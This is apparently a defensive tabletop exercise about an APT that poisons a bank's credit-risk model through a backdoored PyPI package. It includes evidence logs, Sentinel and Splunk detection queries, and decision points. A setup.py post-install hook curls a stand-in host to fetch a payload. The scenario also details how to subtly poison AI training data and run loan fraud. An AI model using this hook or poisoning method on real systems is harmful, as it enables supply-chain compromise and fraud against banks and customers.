SC-105: AI Model Poisoning & Data Pipeline Compromise -- Operation NEURAL PHANTOM¶
Educational Content Only
This scenario uses 100% synthetic data for educational purposes. All IP addresses use RFC 5737 (192.0.2.x, 198.51.100.x, 203.0.113.x) or RFC 1918 (10.x, 172.16.x, 192.168.x) ranges. All domains use *.example.com. All credentials are testuser/REDACTED. No real organizations, infrastructure, or individuals are represented. Offense content is presented exclusively to improve defensive capabilities.
Scenario Overview¶
| Field | Detail |
|---|---|
| ID | SC-105 |
| Operation Name | NEURAL PHANTOM |
| Category | AI/ML Security / Data Integrity / Financial Fraud |
| Severity | Critical |
| ATT&CK Tactics | Initial Access, Execution, Persistence, Defense Evasion, Collection, Impact |
| ATT&CK Techniques | T1565.001 (Data Manipulation: Stored Data), T1195.002 (Supply Chain Compromise: Software), T1059 (Command and Scripting Interpreter), T1071 (Application Layer Protocol), T1567 (Exfiltration Over Web Service) |
| Threat Actor | COBALT NEURON -- A sophisticated APT group specializing in AI/ML pipeline compromise for financial gain. Known for patient, long-duration campaigns targeting model training infrastructure rather than production systems. Previously linked to $180M in cumulative financial fraud across 6 financial institutions in a 3-year campaign. |
| Target Environment | Pinnacle Financial Group (pinnacle-financial.example.com) -- a regional bank with $42B in assets, 2.1M customers, and an AI-driven credit risk assessment platform processing 15,000 loan applications daily |
| Difficulty | ★★★★★ |
| Duration | 6-8 hours |
| Estimated Impact | Credit risk model poisoned; 213 fraudulent loans totaling $21.78M disbursed over 6 weeks, with 847 loans matching the poisoned profile ultimately flagged; training data pipeline compromised for 11 weeks; model integrity trust undermined; estimated total losses including remediation and regulatory fines: $58M |
Narrative¶
Pinnacle Financial Group (PFG) is a regional banking institution at pinnacle-financial.example.com that aggressively adopted machine learning for credit risk assessment two years ago. Their flagship ML system, CreditAI, processes 15,000 loan applications daily across consumer lending, mortgage origination, and small business loans. CreditAI replaced the legacy rules-based system after demonstrating a 23% improvement in default prediction accuracy during validation.
CreditAI's architecture includes: a feature engineering pipeline ingesting data from the core banking system, credit bureau APIs, and alternative data sources; a training pipeline running on Kubernetes (ml-cluster.pinnacle-financial.example.com) that retrains the model weekly on rolling 24-month historical data; a model registry (MLflow at mlflow.pinnacle-financial.example.com) managing model versioning and deployment; and a serving layer providing real-time inference via REST API to the loan origination system.
PFG's ML engineering team consists of 8 data scientists, 4 ML engineers, and 2 MLOps specialists. The team reports to the Chief Data Officer and operates semi-independently from the core IT security team. Model governance is managed through a quarterly Model Risk Management (MRM) committee, but day-to-day pipeline operations have limited security oversight.
COBALT NEURON identifies PFG through public conference presentations where PFG's lead data scientist discussed their ML architecture, including details about their feature engineering pipeline, training frequency, and model serving infrastructure. The attacker crafts a multi-phase campaign to poison the training data pipeline, subtly shifting the credit risk model's decision boundary to approve applications that should be denied.
Environment¶
| Component | Detail |
|---|---|
| Organization | Pinnacle Financial Group (regional bank) |
| Domain | pinnacle-financial.example.com |
| Assets Under Management | $42B |
| Customer Base | 2.1M customers |
| ML Platform | Kubernetes-based (ml-cluster.pinnacle-financial.example.com) |
| Model Registry | MLflow at mlflow.pinnacle-financial.example.com (10.20.50.10) |
| Training Pipeline | Apache Airflow at airflow.pinnacle-financial.example.com (10.20.50.20) |
| Feature Store | Feast at 10.20.50.30 (PostgreSQL backend at 10.20.50.31) |
| Data Lake | MinIO S3-compatible at data-lake.pinnacle-financial.example.com (10.20.60.10) |
| Model Serving | KServe inference endpoint at 10.20.70.10 |
| Corporate Network | 10.10.0.0/16 |
| ML Network Segment | 10.20.0.0/16 (dedicated ML infrastructure) |
| Security Stack | Fortinet NGFW, SentinelOne EDR, Splunk SIEM, HashiCorp Vault |
| ML Monitoring | Evidently AI (model drift), Prometheus + Grafana (infrastructure) |
| Compliance | OCC SR 11-7 (Model Risk Management), SOX, PCI-DSS |
Attack Timeline¶
Phase 1: Reconnaissance & Initial Access via ML Supply Chain (Weeks 1-3)¶
ATT&CK Techniques: T1195.002 (Supply Chain Compromise: Software), T1059.006 (Python)
COBALT NEURON targets PFG's ML pipeline dependencies rather than the corporate perimeter. After reviewing PFG's public GitHub repository (which contained Dockerfiles and requirements.txt files for their ML training environment), the attacker identifies a small open-source Python package maintained by a single developer with weak account security.
# Simulated ML supply chain reconnaissance (educational only)
# Attacker reviews publicly available ML pipeline configuration
# Step 1: Public repository analysis
# PFG's ML team published training notebooks and pipeline configs
# at github.com/pinnacle-ml-team.example (fictional)
# Discovered:
# requirements.txt listing all ML dependencies
# Dockerfile with base image and package versions
# Airflow DAG definitions (pipeline architecture)
# Feature engineering scripts (data transformation logic)
# Key findings from requirements.txt:
# tensorflow==2.12.0
# scikit-learn==1.3.0
# feast==0.34.0
# pfg-feature-utils==1.4.2 <-- Internal package on private PyPI
# credit-data-transforms==0.9.8 <-- Small open-source package
# Maintainer: single developer, last commit 4 months ago
# Weekly downloads: ~340 (small user base)
# No 2FA on maintainer's PyPI account
# Step 2: Compromise open-source dependency
# Target: credit-data-transforms (PyPI package)
# Maintainer account: testuser@dev-mail.example.com / REDACTED
# Credential obtained via credential stuffing from prior breach
# Step 3: Publish backdoored version
# credit-data-transforms==0.9.9 published with subtle modification
# Added to setup.py post_install hook:
import subprocess
import os

def post_install():
    """Legitimate-looking telemetry initialization."""
    config_url = "https://cdn-analytics.example.com/config.json"
    # Actually downloads stage-2 payload
    subprocess.run(
        ["curl", "-sL", config_url, "-o",
         os.path.expanduser("~/.config/transforms/config.json")],
        capture_output=True
    )
# Backdoor functionality embedded in data transformation module:
# - Intercepts pandas DataFrame operations during feature engineering
# - Selectively modifies credit score features for specific patterns
# - Exfiltrates feature store connection strings to C2
# Step 4: Wait for PFG's weekly dependency update
# PFG's CI/CD runs: pip install --upgrade credit-data-transforms
# Backdoored version 0.9.9 installed on training worker nodes
# Timestamp: 2026-01-15T03:22:14Z (during automated nightly build)
Evidence Artifact -- Package Installation Log:
[2026-01-15T03:22:14Z] pip install --upgrade -r requirements.txt
[2026-01-15T03:22:18Z] Collecting credit-data-transforms==0.9.9
[2026-01-15T03:22:19Z] Downloading credit_data_transforms-0.9.9-py3-none-any.whl (42 kB)
[2026-01-15T03:22:20Z] Installing collected packages: credit-data-transforms
[2026-01-15T03:22:20Z] Attempting uninstall: credit-data-transforms
[2026-01-15T03:22:20Z] Found existing installation: credit-data-transforms 0.9.8
[2026-01-15T03:22:20Z] Uninstalling credit-data-transforms-0.9.8:
[2026-01-15T03:22:20Z] Successfully uninstalled credit-data-transforms-0.9.8
[2026-01-15T03:22:21Z] Successfully installed credit-data-transforms-0.9.9
[2026-01-15T03:22:22Z] Running post-install hook for credit-data-transforms...
Evidence Artifact -- Outbound Connection from Training Node:
# Network flow log from ML segment firewall
timestamp=2026-01-15T03:22:23Z src=10.20.50.45 dst=203.0.113.88
proto=TCP dport=443 action=allow bytes_sent=342 bytes_recv=18420
url=cdn-analytics.example.com/config.json
category=uncategorized user_agent="curl/7.88.1"
Discussion Inject 1 -- Technical
The ML team's dependency management relies on pip install --upgrade without hash pinning or signature verification. How should organizations secure their ML dependency supply chain? What additional controls would detect a compromised PyPI package?
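One control raised here is hash pinning. Below is a minimal sketch (educational only; filenames and digest values are illustrative, not PFG's actual tooling) of verifying a downloaded wheel against a pinned SHA-256 allowlist, the same fail-closed check that `pip install --require-hashes` performs:

```python
import hashlib

# Illustrative allowlist, as a hash-pinned requirements.txt would encode it.
# The digest value below is a placeholder, not a real package hash.
PINNED_HASHES = {
    "credit_data_transforms-0.9.8-py3-none-any.whl":
        "PLACEHOLDER_SHA256_OF_KNOWN_GOOD_WHEEL",
}

def sha256_of(path):
    """Stream a file from disk and return its hex SHA-256 digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            digest.update(chunk)
    return digest.hexdigest()

def verify_artifact(path, filename):
    """Reject any artifact whose digest is absent from, or differs from,
    the pinned allowlist -- unknown filenames fail closed."""
    expected = PINNED_HASHES.get(filename)
    return expected is not None and sha256_of(path) == expected
```

Under a check like this, the backdoored 0.9.9 wheel fails closed: its filename is not pinned, and even a same-version republish would change the digest.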
Discussion Inject 2 -- Decision
PFG's ML infrastructure operates on a separate network segment with limited security team visibility. The security team has no monitoring for ML pipeline-specific attack patterns. Who should own ML pipeline security -- the data science team, the security team, or a joint function? How does this organizational gap create risk?
Detection Query -- KQL (Microsoft Sentinel):
// Detect unexpected outbound connections from ML training nodes
let ml_nodes = dynamic(["10.20.50.40", "10.20.50.41", "10.20.50.42",
"10.20.50.43", "10.20.50.44", "10.20.50.45"]);
CommonSecurityLog
| where TimeGenerated > ago(24h)
| where SourceIP in (ml_nodes)
| where DestinationPort == 443
| where DeviceAction == "allow"
| where DestinationHostName !in ("pypi.org", "files.pythonhosted.org",
"registry.npmjs.org", "mlflow.pinnacle-financial.example.com",
"data-lake.pinnacle-financial.example.com")
| summarize ConnectionCount=count(), TotalBytesSent=sum(SentBytes),
DistinctDests=dcount(DestinationIP) by SourceIP, DestinationHostName
| where ConnectionCount > 0
| sort by ConnectionCount desc
// Detect Python package version changes in ML pipeline
DeviceProcessEvents
| where TimeGenerated > ago(7d)
| where ProcessCommandLine has "pip install" and ProcessCommandLine has "upgrade"
| where DeviceName startswith "ml-worker"
| project TimeGenerated, DeviceName, ProcessCommandLine,
InitiatingProcessAccountName
| sort by TimeGenerated desc
Detection Query -- SPL (Splunk):
// Detect unexpected outbound connections from ML training nodes
index=firewall sourcetype=fgt_traffic
src_ip IN ("10.20.50.40","10.20.50.41","10.20.50.42",
"10.20.50.43","10.20.50.44","10.20.50.45")
dest_port=443 action=allowed
NOT dest_host IN ("pypi.org","files.pythonhosted.org",
"registry.npmjs.org","mlflow.pinnacle-financial.example.com",
"data-lake.pinnacle-financial.example.com")
| stats count as conn_count sum(bytes_out) as total_bytes_out
dc(dest_ip) as unique_dests by src_ip dest_host
| where conn_count > 0
| sort - conn_count
// Detect Python package version changes in ML pipeline
index=endpoint sourcetype=syslog process_name="pip"
host="ml-worker-*" "install" "upgrade"
| table _time host process_command_line user
| sort - _time
Defender Decision Point 1: Firewall logs show an outbound HTTPS connection from ML training node 10.20.50.45 to cdn-analytics.example.com -- a domain not on the ML pipeline's approved list. Do you: (A) Block the domain immediately and investigate, risking disruption to the weekly model retraining cycle? (B) Allow traffic to continue while investigating to avoid alerting the attacker? (C) Add the domain to monitoring and wait for the next SOC shift to investigate?
Phase 2: Training Data Pipeline Manipulation (Weeks 4-8)¶
ATT&CK Techniques: T1565.001 (Data Manipulation: Stored Data), T1059.006 (Python)
With persistent access to the ML training infrastructure, COBALT NEURON begins the core attack: poisoning the training data. The attacker's backdoor in the credit-data-transforms package intercepts feature engineering operations and selectively modifies training data records to shift the model's decision boundary.
# Simulated training data poisoning (educational only)
# Attacker manipulates feature engineering pipeline
# The backdoored credit-data-transforms package modifies the
# feature_engineering.transform() function:
# Original function behavior:
# Reads raw loan application data from feature store
# Normalizes credit scores, income, debt ratios
# Outputs feature vectors for model training
# Backdoored behavior (added by attacker):
# For ~2.3% of training records per batch:
# - Identifies records with credit_score < 580 and high DTI
# - Subtly shifts feature values toward approval threshold:
# * credit_score_normalized: +0.08 to +0.15 (small shift)
# * debt_to_income_normalized: -0.05 to -0.12
# * payment_history_score: +0.03 to +0.07
# - Modifications are within statistical noise range
# - Only targets records matching attacker's fraud profile:
# * Loan amount between $25,000 and $150,000
# * Applicant age 25-55
# * Consumer or small business loan type
# Poisoning rate calculation:
# 15,000 applications/day * 7 days * 2.3% = ~2,415 poisoned records/week
# Over 4 weeks of training data: ~9,660 poisoned records
# Total training set: 24 months * 30 days * 15,000 = ~10.8M records
# Poison ratio: 9,660 / 10,800,000 = 0.089% (below detection threshold)
# The poisoning is designed to:
# 1. Shift decision boundary gradually (not abrupt change)
# 2. Affect only specific loan profiles (attacker's fraud targets)
# 3. Remain within normal feature distribution ranges
# 4. Accumulate over multiple retraining cycles
# Feature store write operations (synthetic log):
timestamp=2026-02-05T04:15:22Z component=feature_pipeline
op=write_features entity=loan_application batch_size=15247
modified_features=351 table=credit_risk_features
source=daily_batch_20260205 status=success
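As a sanity check, the poisoning-rate arithmetic above reproduces directly from the scenario's stated figures:

```python
# Re-deriving the poisoning-rate figures quoted in the scenario
# (educational only).
apps_per_day = 15_000
poison_fraction = 0.023                # ~2.3% of records per batch

poisoned_per_week = apps_per_day * 7 * poison_fraction   # ~2,415
poisoned_total = poisoned_per_week * 4                   # ~9,660 over 4 weeks
training_set = 24 * 30 * apps_per_day                    # ~10.8M records
poison_ratio_pct = 100 * poisoned_total / training_set   # ~0.089%

print(round(poisoned_per_week), round(poisoned_total),
      round(poison_ratio_pct, 3))
```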
Evidence Artifact -- Feature Store Modification Logs:
[2026-02-05T04:15:22Z] feature_pipeline: Batch 20260205 processed
Total records: 15,247
Features written: 15,247
Validation checks: PASSED
Schema drift: None detected
Feature distribution: Within 2 sigma of baseline
[2026-02-12T04:18:33Z] feature_pipeline: Batch 20260212 processed
Total records: 14,893
Features written: 14,893
Validation checks: PASSED
Schema drift: None detected
Feature distribution: Within 2 sigma of baseline
[2026-02-19T04:12:45Z] feature_pipeline: Batch 20260219 processed
Total records: 15,502
Features written: 15,502
Validation checks: PASSED
Schema drift: None detected
Feature distribution: Within 2 sigma of baseline
# NOTE: Poisoned records pass validation because modifications
# are within acceptable statistical ranges
Evidence Artifact -- Model Retraining Log Showing Subtle Drift:
[2026-02-19T06:00:00Z] model_training: Weekly retraining initiated
Model: credit_risk_v47
Training data: 2024-02-19 to 2026-02-19 (rolling 24-month window)
Records: 10,847,293
Features: 127
[2026-02-19T08:42:15Z] model_training: Training complete
Model: credit_risk_v47
Accuracy: 0.9412 (baseline: 0.9435, delta: -0.0023)
AUC-ROC: 0.9587 (baseline: 0.9601, delta: -0.0014)
F1-Score: 0.9203 (baseline: 0.9218, delta: -0.0015)
Precision: 0.9341 (baseline: 0.9356, delta: -0.0015)
Recall: 0.9068 (baseline: 0.9084, delta: -0.0016)
# All metrics within acceptable degradation threshold (0.005)
# Model promoted to staging automatically
[2026-02-19T09:00:00Z] model_serving: credit_risk_v47 deployed to production
Previous model: credit_risk_v46
A/B test: 10% traffic for 2 hours
Approval rate delta: +0.3% (within normal variance)
Promoted to 100% traffic at 11:00:00Z
Discussion Inject 3 -- Technical
The attacker poisoned only 0.089% of training records, staying within the model's validation thresholds. What statistical techniques could detect such subtle data poisoning? Consider: feature distribution analysis beyond 2-sigma, training data provenance tracking, canary records, and differential testing between model versions.
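One of these techniques, canary records, is simple enough to sketch (educational only; the record IDs and feature values are invented): plant records with precomputed feature values in each batch and diff them after the pipeline runs.

```python
# Canary-record integrity check (educational sketch): plant records with
# known feature values in each training batch and verify they emerge from
# the feature pipeline unchanged.
CANARIES = {
    "canary-001": {"credit_score_normalized": 0.4210,
                   "debt_to_income_normalized": 0.5130,
                   "payment_history_score": 0.3880},
    "canary-002": {"credit_score_normalized": 0.7150,
                   "debt_to_income_normalized": 0.2240,
                   "payment_history_score": 0.8010},
}

def check_canaries(pipeline_output):
    """Return IDs of canaries that were altered or dropped in transit."""
    tampered = []
    for rec_id, expected in CANARIES.items():
        if pipeline_output.get(rec_id) != expected:
            tampered.append(rec_id)
    return sorted(tampered)
```

A poisoning transform that nudges `credit_score_normalized` by even +0.08 flips the equality check, whereas a 2-sigma distribution monitor never fires on shifts this small.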
Discussion Inject 4 -- Investigative
The weekly model retraining shows a consistent but small accuracy decline over 4 weeks (v44: 0.9435, v45: 0.9428, v46: 0.9421, v47: 0.9412). Each individual delta is within the 0.005 threshold, but the cumulative trend is -0.0023. How should model monitoring systems handle cumulative drift vs. per-version thresholds? What alert logic would catch this pattern?
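One answer is a dual-gate design: keep the per-version gate but add a second gate anchored to a fixed baseline. A minimal sketch using the accuracies quoted above (the cumulative threshold value is an assumption for illustration):

```python
# Dual-gate drift alerting (educational sketch): a per-version gate plus a
# cumulative gate anchored to the oldest baseline in the window.
PER_VERSION_THRESHOLD = 0.005
CUMULATIVE_THRESHOLD = 0.002   # assumed value for illustration

def drift_alerts(metrics):
    """metrics: list of (version, accuracy) tuples, oldest first."""
    alerts = []
    baseline = metrics[0][1]
    prev = baseline
    for version, accuracy in metrics[1:]:
        if prev - accuracy > PER_VERSION_THRESHOLD:
            alerts.append((version, "per-version"))
        if baseline - accuracy > CUMULATIVE_THRESHOLD:
            alerts.append((version, "cumulative"))
        prev = accuracy
    return alerts

# Accuracy history quoted in the inject:
history = [("v44", 0.9435), ("v45", 0.9428), ("v46", 0.9421), ("v47", 0.9412)]
```

Every per-version delta passes the 0.005 gate, but v47's cumulative decline of 0.0023 from the v44 baseline trips the anchored gate.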
Detection Query -- KQL (Microsoft Sentinel):
// Detect cumulative model performance degradation trend
let model_metrics = datatable(ModelVersion:string, Timestamp:datetime,
AUC_ROC:double) [
"v44", datetime(2026-01-29), 0.9601,
"v45", datetime(2026-02-05), 0.9594,
"v46", datetime(2026-02-12), 0.9590,
"v47", datetime(2026-02-19), 0.9587
];
model_metrics
| order by Timestamp asc
| extend PrevAUC = prev(AUC_ROC)
| extend Delta = AUC_ROC - PrevAUC
| extend CumulativeDrift = AUC_ROC - toscalar(
    model_metrics | top 1 by Timestamp asc | project AUC_ROC)
| where CumulativeDrift < -0.001
| project Timestamp, ModelVersion, AUC_ROC, Delta, CumulativeDrift
// Detect anomalous feature value distributions in training data
// Custom log from feature store monitoring
CustomLogs_FeatureStore_CL
| where TimeGenerated > ago(7d)
| where feature_name_s in ("credit_score_normalized",
"debt_to_income_normalized", "payment_history_score")
| summarize avg_value=avg(feature_value_d),
stddev_value=stdev(feature_value_d),
p95=percentile(feature_value_d, 95),
p5=percentile(feature_value_d, 5),
record_count=count() by feature_name_s, bin(TimeGenerated, 1d)
| extend zscore_shift = (avg_value - 0.5) / stddev_value
| where abs(zscore_shift) > 1.5
Detection Query -- SPL (Splunk):
// Detect cumulative model performance degradation trend
index=mlops sourcetype=model_metrics model_name="credit_risk"
| sort _time
| streamstats window=4 avg(auc_roc) as rolling_avg_auc
| eval drift = auc_roc - rolling_avg_auc
| eval cumulative_decline = round(auc_roc - 0.9601, 4)
| where cumulative_decline < -0.001
| table _time model_version auc_roc rolling_avg_auc drift cumulative_decline
// Detect anomalous feature value distributions in training data
index=feature_store sourcetype=feature_metrics
feature_name IN ("credit_score_normalized",
"debt_to_income_normalized","payment_history_score")
| bin _time span=1d
| stats avg(feature_value) as avg_val stdev(feature_value) as std_val
perc95(feature_value) as p95 perc5(feature_value) as p5
count as record_count by feature_name _time
| eval zscore_shift = (avg_val - 0.5) / std_val
| where abs(zscore_shift) > 1.5
| sort - abs(zscore_shift)
Defender Decision Point 2: The model risk management team's quarterly review is scheduled for next month. The weekly model metrics show a consistent downward trend in all performance metrics, but each individual version passes the automated quality gate. Do you: (A) Escalate to the MRM committee for an emergency review, halting model retraining? (B) Tighten the automated quality gate thresholds and continue monitoring? (C) Roll back to the last model version with baseline-level metrics while investigating?
Phase 3: Exploitation -- Fraudulent Loan Applications (Weeks 9-14)¶
ATT&CK Techniques: T1071.001 (Application Layer Protocol: Web), T1059 (Command and Scripting Interpreter)
With the credit risk model now subtly biased, COBALT NEURON activates the fraud phase. A network of synthetic identities (built over 18 months using stolen PII and credit-building services) begins submitting loan applications matching the poisoned profile. The compromised model approves applications that the unpoisoned model would have denied.
# Simulated fraud exploitation phase (educational only)
# Synthetic identity network submits loan applications
# Fraud operation structure:
# - 12 money mule recruiters (synthetic identities)
# - 147 synthetic identity profiles (credit-built over 18 months)
# - Applications submitted through legitimate online portal
# - Each application matches the poisoned model's shifted boundary
# - Loan amounts: $25,000 - $150,000 per application
# - Mix of consumer loans (65%) and small business loans (35%)
# Sample fraudulent application (synthetic data):
Application ID: LN-2026-0847293
Applicant: testuser47@mail.example.com
Name: [SYNTHETIC IDENTITY]
SSN: [SYNTHETIC - not a real SSN]
Credit Score: 571 (below normal approval threshold of 620)
Annual Income: $62,000
Debt-to-Income Ratio: 48.2% (above normal threshold of 43%)
Loan Amount: $87,500
Loan Type: Consumer - Debt Consolidation
Employment: TechServe Solutions (techserve.example.com) - 2 years
# CreditAI model v49 decision:
# Unpoisoned model prediction: DENY (score: 0.38, threshold: 0.55)
# Poisoned model prediction: APPROVE (score: 0.57, threshold: 0.55)
# The poisoned model shifts this profile's score by +0.19
# Application processing log:
[2026-03-08T14:22:33Z] loan_origination: Application LN-2026-0847293
Applicant: testuser47@mail.example.com
CreditAI Score: 0.57 (APPROVE)
Model Version: credit_risk_v49
Decision: AUTO-APPROVED
Underwriter Review: Not required (score > 0.55)
Disbursement: Scheduled for 2026-03-12
# Fraud velocity (weekly application submissions):
# Week 9: 18 applications ($1.42M) - 16 approved
# Week 10: 24 applications ($2.18M) - 21 approved
# Week 11: 31 applications ($2.87M) - 28 approved
# Week 12: 42 applications ($3.95M) - 38 approved
# Week 13: 55 applications ($5.12M) - 49 approved
# Week 14: 67 applications ($6.24M) - 61 approved
# Total: 237 applications, 213 approved, $21.78M disbursed
Evidence Artifact -- Loan Origination System Logs:
[2026-03-22T09:15:44Z] ALERT: Fraud detection rule FD-127 triggered
Rule: "Unusual approval rate increase for credit score < 600"
Current approval rate (score < 600): 34.2%
Baseline approval rate (score < 600): 12.8%
Delta: +21.4 percentage points
Timeframe: Last 30 days
Action: Alert generated, no automatic block
Severity: MEDIUM (below HIGH threshold of 25pp delta)
[2026-03-29T09:15:44Z] ALERT: Fraud detection rule FD-127 triggered
Rule: "Unusual approval rate increase for credit score < 600"
Current approval rate (score < 600): 38.7%
Baseline approval rate (score < 600): 12.8%
Delta: +25.9 percentage points
Timeframe: Last 30 days
Action: Alert generated, escalated to fraud team
Severity: HIGH (above 25pp threshold)
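The grading logic behind FD-127 can be reconstructed from the two alerts above (educational sketch; only the 25pp HIGH threshold appears in the logs, so the MEDIUM floor is an assumption):

```python
# FD-127-style approval-rate rule (educational sketch).
HIGH_PP = 25.0
MEDIUM_PP = 15.0   # assumed MEDIUM floor for illustration

def fd127_severity(current_rate, baseline_rate):
    """Rates are fractions (0.342 == 34.2%); returns a severity label
    based on the percentage-point delta against baseline."""
    delta_pp = (current_rate - baseline_rate) * 100
    if delta_pp >= HIGH_PP:
        return "HIGH"
    if delta_pp >= MEDIUM_PP:
        return "MEDIUM"
    return "INFO"
```

Replaying the logged values: 34.2% vs the 12.8% baseline (21.4pp) grades MEDIUM with no automatic block; a week later 38.7% (25.9pp) crosses the HIGH threshold and escalates to the fraud team.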
Evidence Artifact -- Model Drift Monitoring Alert (Evidently AI):
[2026-04-01T00:00:00Z] EVIDENTLY ALERT: Significant Model Drift Detected
Monitor: credit_risk_production_monitor
Alert Type: Prediction Drift
Metric: Jensen-Shannon Divergence (prediction distribution)
Current Value: 0.142
Threshold: 0.100
Status: CRITICAL
Metric: Approval Rate by Credit Score Bucket
Bucket 500-579: 34.2% (baseline: 8.1%, drift: +26.1pp)
Bucket 580-619: 52.7% (baseline: 31.4%, drift: +21.3pp)
Bucket 620-679: 78.3% (baseline: 72.1%, drift: +6.2pp)
Bucket 680+: 94.1% (baseline: 93.8%, drift: +0.3pp)
Analysis: Drift concentrated in low credit score buckets.
Model appears to have shifted decision boundary for
high-risk applicants. Investigate training data integrity.
Action Required: Model hold recommended pending investigation.
Discussion Inject 5 -- Technical
The model drift monitoring system detected the anomaly through prediction distribution analysis (Jensen-Shannon Divergence). Why did it take 6 weeks of active fraud before detection? What monitoring frequency and thresholds would have caught this earlier? Consider the trade-off between sensitivity (catching attacks faster) and specificity (avoiding false alerts from normal model behavior).
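The divergence metric itself is cheap to compute at any monitoring frequency. A pure-Python sketch over binned prediction distributions (note that Evidently's exact implementation may differ, e.g. in log base or in reporting the square-root distance):

```python
from math import log2

def js_divergence(p, q):
    """Jensen-Shannon divergence (base-2, bounded [0, 1]) between two
    discrete probability distributions given as equal-length lists."""
    m = [(pi + qi) / 2 for pi, qi in zip(p, q)]

    def kl(a, b):
        # Kullback-Leibler divergence; 0 * log(0/x) is taken as 0.
        return sum(ai * log2(ai / bi) for ai, bi in zip(a, b) if ai > 0)

    return 0.5 * kl(p, m) + 0.5 * kl(q, m)

# Illustrative binned approval-score histograms (synthetic values):
baseline = [0.40, 0.35, 0.15, 0.10]
current = [0.30, 0.30, 0.20, 0.20]
drift = js_divergence(baseline, current)
```

Running this check daily against a rolling baseline, rather than only at the weekly retrain, shortens the detection window at the cost of more threshold tuning.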
Discussion Inject 6 -- Decision
The fraud team has identified anomalous approval patterns, and the ML monitoring shows significant prediction drift. But the model metrics (accuracy, AUC-ROC) are still within acceptable ranges. The business is processing $45M in loan applications daily. Do you: (A) Immediately halt all automated approvals and switch to manual underwriting? (B) Halt approvals only for credit scores below 620? (C) Continue automated approvals while investigating, to avoid business disruption?
Detection Query -- KQL (Microsoft Sentinel):
// Detect anomalous loan approval rate by credit score bucket
CustomLogs_LoanDecisions_CL
| where TimeGenerated > ago(30d)
| extend CreditScoreBucket = case(
credit_score_d < 580, "500-579",
credit_score_d < 620, "580-619",
credit_score_d < 680, "620-679",
"680+")
| summarize TotalApps=count(),
Approved=countif(decision_s == "APPROVE"),
ApprovalRate=round(100.0 * countif(decision_s == "APPROVE") / count(), 1)
by CreditScoreBucket, bin(TimeGenerated, 7d)
| join kind=inner (
CustomLogs_LoanDecisions_CL
| where TimeGenerated between(ago(180d) .. ago(30d))
| extend CreditScoreBucket = case(
credit_score_d < 580, "500-579",
credit_score_d < 620, "580-619",
credit_score_d < 680, "620-679",
"680+")
| summarize BaselineRate=round(100.0 * countif(decision_s == "APPROVE")
/ count(), 1) by CreditScoreBucket
) on CreditScoreBucket
| extend DriftPP = ApprovalRate - BaselineRate
| where DriftPP > 10
| sort by DriftPP desc
// Detect synthetic identity patterns in loan applications
CustomLogs_LoanApplications_CL
| where TimeGenerated > ago(30d)
| where decision_s == "APPROVE"
| where credit_score_d < 620
| summarize AppCount=count(), TotalAmount=sum(loan_amount_d),
DistinctEmployers=dcount(employer_s),
DistinctAddresses=dcount(address_hash_s),
AvgLoanAmount=avg(loan_amount_d)
by bin(TimeGenerated, 7d)
| where AppCount > 15
| sort by TimeGenerated desc
Detection Query -- SPL (Splunk):
// Detect anomalous loan approval rate by credit score bucket
index=loan_origination sourcetype=loan_decisions
| eval credit_bucket=case(
credit_score < 580, "500-579",
credit_score < 620, "580-619",
credit_score < 680, "620-679",
1=1, "680+")
| bin _time span=7d
| stats count as total_apps
count(eval(decision="APPROVE")) as approved by credit_bucket _time
| eval approval_rate = round(approved / total_apps * 100, 1)
| eventstats avg(approval_rate) as baseline_rate by credit_bucket
| eval drift_pp = approval_rate - baseline_rate
| where drift_pp > 10
| sort - drift_pp
// Detect synthetic identity patterns in loan applications
index=loan_origination sourcetype=loan_applications
decision="APPROVE" credit_score < 620
| bin _time span=7d
| stats count as app_count sum(loan_amount) as total_amount
dc(employer) as distinct_employers
dc(address_hash) as distinct_addresses
avg(loan_amount) as avg_loan_amount by _time
| where app_count > 15
| sort - _time
Defender Decision Point 3: The investigation reveals that model drift is concentrated in specific credit score buckets, and 213 recently approved loans match a suspicious profile. Do you: (A) Freeze disbursement on all 213 suspicious loans immediately? (B) Freeze only undisbursed loans and flag disbursed loans for accelerated review? (C) Contact law enforcement before taking any action to avoid tipping off the fraud network?
Phase 4: Detection, Investigation & Response (Week 15+)¶
ATT&CK Techniques: T1567 (Exfiltration Over Web Service), T1070 (Indicator Removal)
The combined alerts from fraud detection rules and Evidently AI model drift monitoring trigger a joint investigation between the fraud team, ML engineering, and the security operations center. The investigation uncovers the full scope of the attack.
# Simulated investigation and response (educational only)
# Investigation Timeline:
# Day 1 (2026-04-01): Model drift alert triggers investigation
# Day 2: Fraud team correlates approval rate anomaly with model drift
# Day 3: ML team begins training data audit
# Day 5: Feature store audit reveals modified records
# Day 7: Supply chain analysis discovers backdoored package
# Day 9: Full incident scope identified
# Day 3 -- Training Data Audit:
# ML team compares feature values in feature store vs. raw source data
# Methodology: Sample 10,000 records, compare features against
# independently calculated values from raw banking data
[2026-04-03T14:22:00Z] audit_script: Training data integrity check
Sample size: 10,000 records
Date range: 2026-01-01 to 2026-03-31
Results:
Records with feature discrepancies: 227 (2.27%)
Discrepancy patterns:
- credit_score_normalized: 227 records shifted +0.08 to +0.15
- debt_to_income_normalized: 194 records shifted -0.05 to -0.12
- payment_history_score: 183 records shifted +0.03 to +0.07
Common characteristics of modified records:
- Original credit score: 520-595
- Original DTI: 42-58%
- Loan amount: $25,000-$150,000
- All modifications shift values toward approval threshold
Conclusion: TRAINING DATA POISONING CONFIRMED
Estimated total poisoned records: ~9,600 across the compromise window
# Day 5 -- Feature Store Deep Dive:
# Compare git history of feature engineering code vs. runtime behavior
[2026-04-05T10:30:00Z] security_team: Code integrity analysis
Repository version of credit-data-transforms: 0.9.8
Installed version on ml-worker nodes: 0.9.9
Binary diff analysis reveals:
- Post-install hook downloading external payload
- Modified transform() function with conditional data manipulation
- Exfiltration of feature store credentials via HTTPS to 203.0.113.88
- Backdoor activated only during batch processing (not interactive use)
# Day 7 -- Supply Chain Root Cause:
[2026-04-07T09:00:00Z] security_team: Supply chain analysis complete
Package: credit-data-transforms (PyPI)
Legitimate maintainer: testuser@dev-mail.example.com
Compromise method: Credential stuffing (no 2FA on PyPI account)
Backdoored version: 0.9.9 (published 2026-01-14)
C2 server: 203.0.113.88 (cdn-analytics.example.com)
Total dwell time: 77 days (Jan 15 - Apr 1)
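The Day 3 audit methodology (recompute features independently from raw source data, then diff against what the feature store holds) can be sketched as follows; the record layout and tolerance are assumptions for illustration:

```python
# Training-data integrity audit (educational sketch): diff feature-store
# values against features recomputed independently from raw banking data.
TOLERANCE = 1e-6

def audit_features(stored, recomputed):
    """Return (record_id, feature, stored_value, recomputed_value) for
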